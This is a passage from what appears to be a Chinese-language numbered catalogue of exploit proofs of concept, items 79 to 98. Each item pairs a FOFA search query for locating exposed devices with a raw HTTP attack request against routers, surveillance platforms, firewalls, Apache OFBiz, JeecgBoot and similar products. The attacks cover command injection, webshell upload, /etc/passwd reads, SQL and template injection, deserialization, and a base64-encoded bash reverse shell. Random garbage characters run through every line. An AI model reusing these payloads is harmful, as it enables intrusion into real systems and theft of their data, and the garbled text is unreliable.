1 T* k3 r) |- J6 e g) w9 m# `. @- I- z2 B. I6 ~, W- q9 o0 T
/Applications/SkillDevelopAndEHS/
, B' y* {8 a5 e. @8 @; N% q' v------YsOxWxSvj1KyZow1PTsh98fdu6l--
# c- p) G) f) S: q3 m6 \) L8 N/ A% u! G% K' D
7 ~/ V1 k& D/ t9 B6 H0 N8 oGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.18 s9 S* a9 |" z! ?3 {, k
Host: x.x.x.x) A" L- n$ T) i. N
( m9 U" }! ~2 N3 U+ V8 F6 F# w" \- s
79. BYTEVALUE 百为流控路由器远程命令执行
6 Z4 T- }( Y; V* TFOFA:BYTEVALUE 智能流控路由器5 s0 f3 f! Q' G* ^! G L# ^9 C' |
GET /goform/webRead/open/?path=|id HTTP/1.1
+ q+ |6 D( P/ U8 I* ]& Z3 b7 MHost:IP
, C' O/ g O) a% r: S# Y B9 F dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0+ P. Y; |0 A) B% d: k& O6 i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" X* k: c, E3 ?# r+ A2 \9 yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 H7 h( Z2 i. ^! tAccept-Encoding: gzip, deflate. a, c* p& n8 [0 |; ~
Connection: close% T( g, @5 v) W( W) s
Upgrade-Insecure-Requests: 1
7 Q4 O1 s V) O6 w* [: D( v; S* \3 I/ c5 u' f- P
4 E* _* h0 C& R( U' G8 x80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传& U) J9 g( h, v' E# M- Y G7 a: M
FOFA:app="速达软件-公司产品"# X: [8 }( w% o4 W0 _
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
5 t [+ _/ ~3 e0 @! b' zHost: x.x.x.x
% ~# O( ]! \0 r$ {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ ~- F4 ~( r3 N; g
Content-Length: 270 J5 [* G3 Y S, O3 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! ?+ Y! Q! W3 M8 C3 sAccept-Encoding: gzip, deflate
6 B4 W9 X/ @) YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! T6 C q: L2 u& p2 n6 ^7 z4 J
Connection: close
- Z, C# f6 k& M8 V. aContent-Type: application/octet-stream
5 }9 K2 L1 {+ @Upgrade-Insecure-Requests: 14 m2 I3 z, L4 P2 `/ o7 f! C
0 [3 |6 c4 g9 [* ?- I8 Z
<% out.print("oessqeonylzaf");%>+ [2 u* \" k( F- M3 n+ `
* M8 S; N1 l, f9 F% b# v
' C' r" {( I% K5 k% r; `+ V" t+ XGET /xykqmfxpoas.jsp HTTP/1.10 l- ^; ?! M& X. A
Host: x.x.x.x
0 x2 e4 Q0 a5 L0 x& w0 MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 G- @% ^/ I Y- p5 |- p
Connection: close( K" L9 ?4 f/ c
Accept-Encoding: gzip. s0 ^$ s$ F3 @- M$ Y
: y$ _# _8 G( b ~3 s8 q) u
_0 @) d4 `3 k1 |& v& b( v81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露; ]$ h* r+ K: F, q0 B
FOFA:app="uniview-视频监控") q8 H3 X8 W3 ?# q
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
" v3 [: ?, U$ |$ w% Y! i5 k/ GHost: x.x.x.x" u9 _7 _. P; \; O5 {0 _4 J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 b# w2 r& ?: \9 n, O9 j# qConnection: close
# P3 H# `0 T8 B3 w K# ~4 gAccept-Encoding: gzip D7 L" O7 o- ]* S" ~- [0 X
' E9 q! Q& E& j7 E( R
, p& I1 m/ L) B82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
6 ?3 d; C, D4 E" |/ ^! w* f |7 kFOFA:app="思福迪-LOGBASE"! [7 }% ?$ A/ F( s
POST /bhost/test_qrcode_b HTTP/1.1, }$ t; F8 x+ f2 T( }5 @9 E
Host: BaseURL
/ A3 u2 N$ P' G! i8 J0 ?! zUser-Agent: Go-http-client/1.1
1 N& H+ \( v' D; I3 E6 V3 oContent-Length: 239 y" g, l/ |; ~- L; p" S2 v* R1 _
Accept-Encoding: gzip
2 _% n# g) X5 N4 t2 O3 H, y1 X2 DConnection: close
3 l. S) J0 e% m; v) _" p" {! hContent-Type: application/x-www-form-urlencoded
* K4 C2 M2 B2 O; V4 L) BReferer: BaseURL
& N) f; {: z# |' I/ R( i q0 K8 \+ }9 t
z1=1&z2="|id;"&z3=bhost
" {0 D0 I% D9 A. b: h9 V+ k% K
4 A/ z* x' f, A9 }. `! t) M! m
$ v- H6 d; `( l83. JeecgBoot testConnection 远程命令执行, _% o @, O9 j5 D+ ?- v: ^
FOFA:title=="JeecgBoot 企业级低代码平台"& O/ q' g x* T) o
# \! }- Y7 t- |9 }3 Y0 c
1 T1 e; L- D" M1 W5 D' _4 dPOST /jmreport/testConnection HTTP/1.1+ A4 d) |- g+ N- Y( J% k
Host: x.x.x.x
) l' l7 m! e. W$ ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" \. K) G* H" f: DConnection: close/ u, H. D: z, H7 I; N- \
Content-Length: 8881% O7 S; L, a. P0 G
Accept-Encoding: gzip
: |. g0 ]$ r2 n+ yCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"- I0 O' n1 e4 T" ~" w
Content-Type: application/json
$ o. n9 r: w# \+ h
, V$ ~: q5 Q' U' \/ ?# yPAYLOAD
0 C T. [9 H8 |0 j( c
( e/ {4 K; X) z84. Jeecg-Boot JimuReport queryFieldBySql 模板注入6 R+ O- l4 t9 V3 J% l B a
FOFA:title=="JeecgBoot 企业级低代码平台"
" E/ @9 F! {2 S9 b( A' e: d
9 g) O/ X/ d( H% i1 |$ J
, X Q2 x( V. a7 C; q" `5 n1 P$ S8 P: O+ }9 V
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1( f8 T/ D+ J( H( W$ p; K
Host: 192.168.40.130:8080
+ \# a# B! ^( ]9 vUser-Agent: curl/7.88.13 j: f% f9 E7 m8 m+ u
Content-Length: 156( J# K) z- K9 n: J7 k c
Accept: */*/ U: {# C$ F( ~0 T6 T2 y$ z
Connection: close1 q( m3 T0 p* N$ |
Content-Type: application/json
1 c# q- |$ m' n. m& VAccept-Encoding: gzip
7 v, z+ o5 v9 h4 \$ Z# D9 S f# w4 j& g) s9 E+ N N: d
{# l% W: T9 d! @1 U# d5 I2 O
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
1 _" p9 Q8 y* u& Q "type": "0"
$ T% h! u3 j5 j( V; X}; R ~8 r! n0 W; E4 S, b; c
9 n" t) p* d+ V# P5 c+ L
2 [; {- \2 J; r* J- P. e
85. SysAid On-premise< 23.3.36远程代码执行7 ?1 O h/ Y8 i6 T' C0 ]9 @! ]2 _
CVE-2023-47246: d+ C" R9 H! \6 z1 N: t9 J
FOFA:body="sysaid-logo-dark-green.png" ( @0 ^6 v) K8 c' U
EXP数据包如下,注入哥斯拉马& v3 L5 h e4 ?+ C/ `& C% ?
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1* A, @8 b5 a$ ~, s6 ~# F# Q9 }
Host: x.x.x.x( s# r6 y' m x6 p: \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( `. |& M2 O& z, yContent-Type: application/octet-stream
) H) Q/ [2 n; |. O0 A) JAccept-Encoding: gzip: w$ s4 r# `, y3 N4 o
|/ w7 i1 _% {1 G2 n1 y) d& s5 [PAYLOAD( m: \0 l2 B( j2 t8 @3 s$ V
( P3 m+ O7 g& j! `$ N
回显URL:http://x.x.x.x/userfiles/index.jsp
9 k- ^- I/ b+ p& n) h- J( ]4 O( s1 ]0 _& [3 }* i. p
86. 日本tosei自助洗衣机RCE
, y* W5 S) H5 _$ q& |: t1 w& jFOFA:body="tosei_login_check.php"9 B9 f, o! n9 Z- a0 K
POST /cgi-bin/network_test.php HTTP/1.1
?& v- N1 L6 q% ~' U/ oHost: x.x.x.x4 F% @) v6 ~8 c3 k1 a9 q
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
4 _) Y3 y3 @7 jConnection: close
1 A2 f. u+ I3 J7 n IContent-Length: 44& c3 Q. \1 ^5 a) r, X0 i& W
Accept: */*# o* _: ?4 g# Z* T& X) Z2 `" R
Accept-Encoding: gzip: A% ]. b% Z$ s$ }+ A
Accept-Language: en8 h- Q( w( s9 K. m; s6 r$ o; Z; F
Content-Type: application/x-www-form-urlencoded
7 A' h. l! n5 p! z" F1 |, \' w4 z
& E. w5 }5 ~" `% T6 D7 ?* P7 Ehost=%0acat${IFS}/etc/passwd%0a&command=ping
6 N7 c w r6 [' [/ `$ B% Z( {# k8 E5 ]6 K, k1 G2 S( X2 W& h
* A5 g* m. d6 g( ?+ A" L87. 安恒明御安全网关aaa_local_web_preview文件上传" T$ G, \! W0 F2 g: b+ F0 c) A1 o
FOFA:title="明御安全网关"
: I! j1 i* n& Z( C& e, nPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
" K9 u. h2 t+ e; C7 YHost: X.X.X.X- m( H- R) x( d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 B+ U) N1 A% Z5 c3 IConnection: close
$ a' p! ^+ V' n, w; X- r" t2 h+ t! AContent-Length: 198& [- ^* e" x4 l* F6 E3 F; E$ K- }
Accept-Encoding: gzip
) v0 ~ g; W, `& Z; u# NContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
; O* K9 K2 k `, E6 v' k# e6 [' I4 |( R/ E" n
--qqobiandqgawlxodfiisporjwravxtvd
. g# M' i$ K: W. `5 d# {Content-Disposition: form-data; name="123"; filename="9B9Ccd.php", O, ]/ L6 o* y7 g( z7 M$ ]7 E
Content-Type: text/plain5 I4 g' ]: n9 C, p
; `5 [2 e9 g1 r# _2ZqGNnsjzzU2GBBPyd8AIA7QlDq, O, w" f0 z2 l5 t. z
--qqobiandqgawlxodfiisporjwravxtvd--
6 a8 G: x& U" [7 p) a2 K/ S: F
/ |" e; x" z9 u9 C& z" |6 p' f
0 M# h2 D# {. R/jfhatuwe.php/ L" W# A+ J) q
/ P4 y. v e6 p' }6 P! i
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行 o7 b7 C4 j6 c. H
FOFA:title="明御安全网关"
( Q% Z, N# D2 C& G$ S1 P+ MGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
! D' Z Q7 d0 W7 f$ LHost: x.x.x.xx.x.x.x2 l ? N9 R0 J3 l1 s; |2 c e$ x( e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( U8 a* h* F' w! k i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; U+ T$ G7 g1 AAccept-Encoding: gzip, deflate
6 I* H0 i3 |1 T/ O# i( P% i7 @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( L2 ^2 h2 w6 l0 e6 l! f4 C$ q
Connection: close
& j P# w) m+ n) |3 ]7 ]# k4 X; p
T5 _% G! E* ^" X2 K6 c
; z- E9 \ p. A/ j/astdfkhl.php' a! Z( F9 B! e# I
; K6 }" Z$ z: c( D; \89. 致远互联FE协作办公平台editflow_manager存在sql注入, ^: L+ S8 z8 o& H
FOFA:title="FE协作办公平台" || body="li_plugins_download"
2 k) W) u8 t8 V3 w2 N$ p2 p, HPOST /sysform/003/editflow_manager.js%70 HTTP/1.14 G+ d3 ?$ x0 n4 ^
Host: x.x.x.x
6 s4 n. a5 Y. x, `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. k/ d' l3 z! i
Connection: close
& ?) J1 e! d" z& T! [4 W' j- X5 gContent-Length: 41
/ m- H9 k0 @2 X1 _9 _Content-Type: application/x-www-form-urlencoded
" b0 y5 y- `+ `4 }% ?' |" mAccept-Encoding: gzip/ l9 n. M ?: C' F+ x) c
# @0 g5 v9 \* @2 L @4 D. \option=2&GUID=-1'+union+select+111*222--+5 J( X8 k! @ \5 S/ X
( J) p* Y& V1 E; l, w$ B/ v
: M) n p. Q# I: W/ p- B3 K* C90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
+ }- a4 @, H/ o' b/ m0 Z7 ?FOFA:icon_hash="-1830859634"- @& j) ?) S4 V" e8 w3 p; ~; r! b
POST /php/ping.php HTTP/1.1( I) g* F- k) u0 h/ N% s% |
Host: x.x.x.x9 p8 D$ d$ @$ [& a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0$ ?# ]2 C8 {" L2 v6 j4 Q# J
Content-Length: 51
: C8 @. X' v' T$ _9 D/ g4 }Accept: application/json, text/javascript, */*; q=0.01
' k" u4 Z, [1 h, e( [* |Accept-Encoding: gzip, deflate
* p; ]: z& [& n* V( [2 h2 iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! I. v6 U3 G. _5 @/ FConnection: close
2 n0 g- I+ y" S. {0 m( g; ?$ G( yContent-Type: application/x-www-form-urlencoded
8 [& e U: l" u! r* BX-Requested-With: XMLHttpRequest
. K+ |6 V) u6 A) M" j* f
0 x1 p) `! c* ^' }7 N; rjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
' g0 z- z+ {( l" v+ y, }8 t8 G
; S$ z3 ?6 [2 \2 c4 O5 M \+ P
5 _: U! S- d6 x0 [" O91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取* N" v+ W" Y# y% M A2 ?6 k: m' I
FOFA:title="综合安防管理平台") A9 K0 k& j5 ]2 ~8 X* z
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.14 H. o: h; ~$ J
Host: your-ip
$ _) ]- T! [3 N. M0 s9 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.364 [4 O4 t. B0 X6 y9 q" X7 q! V
Accept-Encoding: gzip, deflate
# K" @) c& l, @, s8 o2 c! z2 eAccept: */*) U7 x: s, D5 ?8 F8 a0 I. x+ P; q3 e
Connection: keep-alive+ g6 x% ~+ [$ D6 a4 N
3 y6 r; x" X' F7 u3 O* u
- V" ^5 v# W$ e9 Z7 ?- K& b; ?& ]6 O2 b! n, y+ ?
92. 海康威视运行管理中心session命令执行
5 {# b. a- y/ x+ O6 h- ]* QFastjson命令执行+ |# Z% A G$ i2 m8 p9 u; A2 a) C
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
+ v$ D7 g# }* z1 U UPOST /center/api/session HTTP/1.13 r J7 L) ^9 ?/ O% c
Host:8 m7 B* J$ V, |' @
Accept: application/json, text/plain, */*# [- e; C, L* M0 M
Accept-Encoding: gzip, deflate
5 ~! o% J2 e8 ~' YX-Requested-With: XMLHttpRequest: U$ N( D% k( N
Content-Type: application/json;charset=UTF-85 m+ A! M1 V" j3 o9 ]" ^3 T* x' b
X-Language-Type: zh_CN
- W4 W9 A2 t' s; \* ]% sTestcmd: echo test
! {/ ?( b; e/ iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
4 E! V$ w6 Y9 fAccept-Language: zh-CN,zh;q=0.9# s: T0 @( b3 _ t. Y$ Q9 t
Content-Length: 5778- b) ]; j' h( N/ x/ e* g
" C+ N8 [% L$ xPAYLOAD
( Y5 K. W/ w6 ]' o) a) i$ f$ E7 T/ Z+ D/ w2 i0 J
* ^! f G! a& q- A8 H
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
# Q" ], R- b* n3 f7 F* D9 o$ jFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
$ c/ y) x1 W; \POST /?g=app_av_import_save HTTP/1.1
; ] k6 }9 ~: T( tHost: x.x.x.x2 E$ ?4 i7 r. j0 M/ Y! \* l
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx: r7 r, q& A+ w3 ?- y
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.363 U8 d1 y# k, T8 w
" |* l3 |0 ~4 b, L/ n" a------WebKitFormBoundarykcbkgdfx
# n8 l* w9 O' ^, d! B0 G& zContent-Disposition: form-data; name="MAX_FILE_SIZE"/ v% w' i! h) \' v
0 N/ [- Z3 f& x$ S
10000000
( S: k9 v5 I& j4 a* |------WebKitFormBoundarykcbkgdfx8 ~& N3 ?) e! c5 b N
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
$ |9 \- v2 }; M0 IContent-Type: text/plain" o) m# |* ~! e$ B
$ w% ?* c/ J* `wagletqrkwrddkthtulxsqrphulnknxa
' J9 s9 c8 b) J------WebKitFormBoundarykcbkgdfx4 {, I% ?6 `, v% {3 @- U0 ~
Content-Disposition: form-data; name="submit_post", w/ x/ p# T7 V- b
# b% ]$ K6 v) F: t- m
obj_app_upfile- f( A* ]+ K4 r# V. ~
------WebKitFormBoundarykcbkgdfx& C2 L/ Y! |. ]8 P$ z) ?& U
Content-Disposition: form-data; name="__hash__", r8 P" I3 I; J5 h$ q
! L; q" S7 G5 f- q( n4 i
0b9d6b1ab7479ab69d9f71b05e0e9445( l( ^* a L7 \# |( a
------WebKitFormBoundarykcbkgdfx--' m9 @! I0 D5 u; ^8 {& v0 O0 ~; q9 q6 l
- V; X, b! c2 Z+ W& j0 N
& [, n; ?# o0 g8 N/ DGET /attachements/xlskxknxa.txt HTTP/1.1
* n3 E1 P5 e; H/ S8 c% iHost: xx.xx.xx.xx$ ?/ i' {1 R6 a3 U
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.363 h& ]) F8 c2 Q* ^5 w
6 ~8 D' y2 s5 A/ D+ M9 b" u, ]9 w
7 L* q" {# Q* k* {+ q, `94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
% s5 R4 u5 [0 X0 [, _5 j+ E* G; SFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="$ z* c" Y& Q1 t. {
POST /?g=obj_area_import_save HTTP/1.1
$ |( i9 f- p# y; t. t4 P4 yHost: x.x.x.x
3 E3 x2 ?) n0 tContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt4 K( s/ P$ @; j( m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
0 B% f0 `5 Y/ W) x8 _1 s2 Q# ?$ Y, J6 @; L% y
------WebKitFormBoundarybqvzqvmt7 j; Q. D9 }8 ^% F% y
Content-Disposition: form-data; name="MAX_FILE_SIZE"& ~. }+ g5 H2 Y! A0 _7 e: U
0 C3 i7 w' h' p
10000000
8 K% {( o" B2 c------WebKitFormBoundarybqvzqvmt# u) w. r% ~# ~. U- L& [
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
$ g/ B, C8 A& N) S1 kContent-Type: text/plain/ h" x! l2 t4 E. O8 u1 H
2 [7 [# ^* b* D2 `
pxplitttsrjnyoafavcajwkvhxindhmu+ J# O9 M( C5 A9 ?
------WebKitFormBoundarybqvzqvmt
2 v! x3 A: A+ C3 x4 j3 z8 YContent-Disposition: form-data; name="submit_post"
w7 ^ F3 [( K- b+ d! m; n( b
! T' b! ^2 K; r I Pobj_app_upfile
o% Z/ x- H R1 m/ C------WebKitFormBoundarybqvzqvmt% m4 ]& |- X- V% |+ w% i4 {! w
Content-Disposition: form-data; name="__hash__"
1 m1 p/ C* Y9 O: Q/ o& U/ m: j9 j6 ]0 l r% |: j
0b9d6b1ab7479ab69d9f71b05e0e9445
* d4 r5 X3 N5 ^------WebKitFormBoundarybqvzqvmt--- F' ~$ T7 t0 j( f2 N
4 v# N7 N8 Z% r2 J& B: V
7 J/ T/ v+ i) q: c" g
* X$ G) W, ]. F l0 g' g& W9 L. ^
GET /attachements/xlskxknxa.txt HTTP/1.1- B5 j- G7 k+ d" J0 N( P
Host: xx.xx.xx.xx) Y1 i0 r1 Z( n7 S0 {/ c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36/ S- B* l) R' N
6 N; `3 D/ Z' K- U7 u" _& z
6 d- m( B+ N( d0 a( C: r: B) w r: y- H: {& h& v. u
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行' t8 u- A. w8 i
CVE-2023-490705 M5 k3 ` g! x! v1 [7 t' u9 {) O5 m
FOFA:app="Apache_OFBiz"0 z5 n9 _% W$ H( X6 i9 L; `1 J! d
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
% ~. q- Z" Y$ s9 M+ H5 kHost: x.x.x.x
- [% @3 u1 X0 B X* jUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.363 {. z! t% g7 r' j: Q
Connection: close
) x4 ]9 l$ V8 r* k/ a" p; C+ KContent-Length: 889
8 w1 B5 R/ L) i8 D# EContent-Type: application/xml* A2 b" M w2 U$ C. G
Accept-Encoding: gzip
! C W, ^% T4 t4 O& u; r, b7 B% m+ X
<?xml version="1.0"?>
0 }0 [1 Y" M: ]0 M9 P<methodCall>
. U; c: ~) B) {3 n <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>5 ~) X& G1 s3 a% d' P
<params>
0 h' Q4 F! ~) {4 q( I <param>
+ U" D1 J5 o; K) _7 b& W <value>% b" J& x7 T& S* Q+ d4 p6 A2 d1 \
<struct>2 J1 b" L8 ?# e1 X. r! b4 V
<member>: h0 P3 K) O( Y0 W, l4 M' `0 \
<name>test</name>1 T$ @0 P/ t3 m1 ?7 ?* e7 j
<value>& N' x9 _. d: o6 @3 o# w
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
2 T9 k$ m! L+ ^3 w1 g </value>
9 V9 z' ?* y4 X- [9 e8 A </member>
% z& P9 ?4 P! P' K2 `. V& L </struct>
$ K5 u1 a3 i& X" p% r I8 A/ M, E/ V </value>
; S" T8 n' B1 [1 `. C. B! n </param>( y% A3 \" k4 M- w8 |
</params>
7 c! m/ M; o3 Q, x</methodCall>) x5 a9 }9 r# L
' |# u/ m9 g& w3 c# B5 V5 g, j' B2 T9 q, C' l% s- p$ J# m v3 j
用ysoserial生成payload
; K! ~- ?6 A3 w: Tjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
% a& ^2 X7 Y- m6 ?- J& J9 v
( T% C+ ?5 P% u4 [$ b
$ [( s, M* [' L: M将生成的payload替换到上面的POC) Q. I! j" i- q7 g. k! v
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
) C$ a9 H; X) s1 W3 h6 d& mHost: 192.168.40.130:8443
B0 A# A7 J3 a$ q e. GUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
' K! P- }2 _3 f [Connection: close. X7 o1 _1 y4 z8 p- {0 j) n
Content-Length: 889
% J6 ?, | V) {; {Content-Type: application/xml
; n# H. T. R( s7 }' \/ LAccept-Encoding: gzip
( p) Q# H* e# W6 A
) K( l) c4 N8 ~4 D" A& PPAYLOAD4 U+ K. N& ^# E$ Y/ g
' T2 g/ L, `% [
96. Apache OFBiz 18.12.11 groovy 远程代码执行
3 O7 j; w. e3 M9 }# X8 VFOFA:app="Apache_OFBiz"0 H0 S! u2 X3 l, B+ m
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1% o% ~5 m2 p w9 c! y% v6 ]0 G
Host: localhost:8443
2 V9 U$ d# m5 A+ JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0: i. V" m+ ^' l! f o& W4 N! \. a
Accept: */*
, [8 f {3 W% _) _3 uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 r k7 K5 m# |+ z4 w5 G$ jContent-Type: application/x-www-form-urlencoded( k' x1 J( Z) u1 @. V1 A
Content-Length: 55& Q7 w7 b* U1 y* r0 l+ k1 ^( w: J
2 v& F/ D1 Y% {9 i5 I! `# v YgroovyProgram=throw+new+Exception('id'.execute().text);9 A- U9 c6 D3 Y7 h* V3 ^
' p2 g) y! ]0 V6 B: q
|+ g- s5 t. q6 u, n# _6 K反弹shell
' J6 ~ E" b5 a3 o) d在kali上启动一个监听0 `* Y0 N+ l3 k
nc -lvp 7777
0 Z3 N$ \( h; h" W( D
2 W+ M" e* m$ N$ [1 e- Y/ }POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1; ?, n# B5 H% Q& r) T
Host: 192.168.40.130:8443
' k: H3 s! L. Q# k4 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
$ B; x7 e5 K( H e! [% t2 aAccept: */*, ]5 ] T: z; b* m2 x2 @5 v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- y/ H. Y2 ]- p( ~6 \; e; i" _( i! ]
Content-Type: application/x-www-form-urlencoded2 Q6 ]& j2 K# J$ V# ^
Content-Length: 716 r% m7 a0 S+ c
3 X+ f2 p Q2 ?$ w# dgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();5 t4 h* v. H0 N! @0 O8 Z, f$ o
/ h( i$ H9 c+ t4 |97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
; @ ]$ B: n" W+ l/ D8 nFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"! R" L/ e7 j T; h8 l: d
GET /passport/login/ HTTP/1.1
w6 V) r' P: S1 H6 kHost: 192.168.40.130:80850 v% B! I6 Q: J: p: ^5 ?8 P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& V3 g! J" @; U5 | K$ {Accept-Encoding: gzip
; F' a1 {1 J1 ?* q2 mConnection: close
3 c2 v7 ~5 e1 ]$ T3 T4 y) UCookie: rememberMe=PAYLOAD3 t! n* B5 |" v2 J/ B7 w
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
7 c! }3 v$ u) K. x( M) J* {6 |9 L& o* h0 R" Y) I0 y
- Z5 r" M0 D( j' \
98. SpiderFlow爬虫平台远程命令执行
/ a0 b; K( e/ [ o4 H- mCVE-2024-0195
, d8 R* ~+ {4 f9 \FOFA:app="SpiderFlow"7 S2 Z) j9 y2 ~2 o
POST /function/save HTTP/1.1" H% Z8 M7 f" x
Host: 192.168.40.130:8088# D& O) G9 e+ F* e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0% G% s: g' p" w. X3 v6 ]- ]
Connection: close
